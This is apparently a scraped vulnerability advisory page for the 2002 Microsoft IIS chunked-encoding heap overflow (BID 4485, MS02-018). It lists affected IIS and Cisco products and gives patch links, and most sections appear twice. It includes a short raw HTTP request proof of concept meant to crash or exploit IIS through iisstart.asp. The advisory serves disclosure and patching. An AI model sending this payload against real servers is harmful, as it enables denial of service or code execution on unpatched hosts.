Microsoft IIS Chunked Encoding Transfer Heap Overflow Vulnerability
BID:4485
Info
Microsoft IIS Chunked Encoding Transfer Heap Overflow Vulnerability
| Bugtraq ID: | 4485 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 10 2002 12:00AM |
| Updated: | Apr 10 2002 12:00AM |
| Credit: | Discovery of this issue is credited to eEye Digital Security. |
| Vulnerable: |
Microsoft IIS 5.0 Microsoft IIS 4.0 Cisco Unity Server 2.4 Cisco Unity Server 2.3 Cisco Unity Server 2.2 Cisco Unity Server 2.1 Cisco Unity Server 2.0 Cisco Call Manager 3.2 Cisco Call Manager 3.1 Cisco Call Manager 3.0 Cisco Building Broadband Service Manager (BBSM) 5.1 Cisco Building Broadband Service Manager (BBSM) 5.0 Cisco Building Broadband Service Manager (BBSM) 4.5 Cisco Building Broadband Service Manager (BBSM) 4.4 Cisco Building Broadband Service Manager (BBSM) 4.3 Cisco Building Broadband Service Manager (BBSM) 4.2 Cisco Building Broadband Service Manager (BBSM) 4.0.1 |
| Not Vulnerable: | |
Discussion
Microsoft IIS Chunked Encoding Transfer Heap Overflow Vulnerability
A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services).
This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.
Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.
A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services).
This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.
Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.
Exploit / POC
Microsoft IIS Chunked Encoding Transfer Heap Overflow Vulnerability
The following proof-of-concept may be used to reproduce this condition using a utility such as telnet or netcat:
**************Begin Session****************
POST /iisstart.asp HTTP/1.1
Accept: */*
Host: eeye.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
10
PADPADPADPADPADP
4
DATA
4
DEST
0
[enter]
[enter]
**************End Session******************
This example uses the iisstart.asp script that ships with Microsoft IIS 5.0.
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept may be used to reproduce this condition using a utility such as telnet or netcat:
**************Begin Session****************
POST /iisstart.asp HTTP/1.1
Accept: */*
Host: eeye.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
10
PADPADPADPADPADP
4
DATA
4
DEST
0
[enter]
[enter]
**************End Session******************
This example uses the iisstart.asp script that ships with Microsoft IIS 5.0.
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
Solution / Fix
Microsoft IIS Chunked Encoding Transfer Heap Overflow Vulnerability
Solution:
Microsoft has released an IIS cumulative patch to address this issue and
others.
There are reports of problems with the fixes for users who are running Microsoft IIS Site Server. A hotfix to address problems caused as a side effect of installing the cumulative patch has apparently been released by Microsoft. Any users who have experienced difficulties as a result of installing the cumulative patch are advised to contact Microsoft support and request hotfix Q317815.
Users of Cisco Unity products and Cisco Building Broadband Service Manager 4.x/5.x are advised to apply Microsoft's cumulative patch.
Microsoft IIS 4.0
Microsoft IIS 5.0
Cisco Unity Server 2.0
Cisco Unity Server 2.1
Cisco Unity Server 2.2
Cisco Unity Server 2.3
Cisco Unity Server 2.4
Cisco Call Manager 3.0
Cisco Call Manager 3.1
Cisco Call Manager 3.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
Cisco Building Broadband Service Manager (BBSM) 4.2
Cisco Building Broadband Service Manager (BBSM) 4.3
Cisco Building Broadband Service Manager (BBSM) 4.4
Cisco Building Broadband Service Manager (BBSM) 4.5
Cisco Building Broadband Service Manager (BBSM) 5.0
Cisco Building Broadband Service Manager (BBSM) 5.1
Solution:
Microsoft has released an IIS cumulative patch to address this issue and
others.
There are reports of problems with the fixes for users who are running Microsoft IIS Site Server. A hotfix to address problems caused as a side effect of installing the cumulative patch has apparently been released by Microsoft. Any users who have experienced difficulties as a result of installing the cumulative patch are advised to contact Microsoft support and request hotfix Q317815.
Users of Cisco Unity products and Cisco Building Broadband Service Manager 4.x/5.x are advised to apply Microsoft's cumulative patch.
Microsoft IIS 4.0
-
Microsoft Q317636
Windows NT Server 4.0, Terminal Server Edition, Security Rollup Package
http://www.microsoft.com/ntserver/terminalserver/downloads/critical/q3 17636/default.asp -
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe
Microsoft IIS 5.0
-
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Unity Server 2.0
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Unity Server 2.1
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Unity Server 2.2
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Unity Server 2.3
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Unity Server 2.4
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Call Manager 3.0
Cisco Call Manager 3.1
Cisco Call Manager 3.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Building Broadband Service Manager (BBSM) 4.2
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Building Broadband Service Manager (BBSM) 4.3
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Building Broadband Service Manager (BBSM) 4.4
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Building Broadband Service Manager (BBSM) 4.5
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Building Broadband Service Manager (BBSM) 5.0
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Building Broadband Service Manager (BBSM) 5.1
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
References
Microsoft IIS Chunked Encoding Transfer Heap Overflow Vulnerability
References:
References:
- IIS ASP ChunkedEncoding exploit (CORE Security)
- Microsoft Security Bulletin MS02-018 (Microsoft)
- Q317636 Windows NT Server 4.0, Terminal Server Edition, Security Rollup Package (Microsoft)
- Technet Security (Microsoft)
- Vulnerability Note VU#610291 (CERT/CC)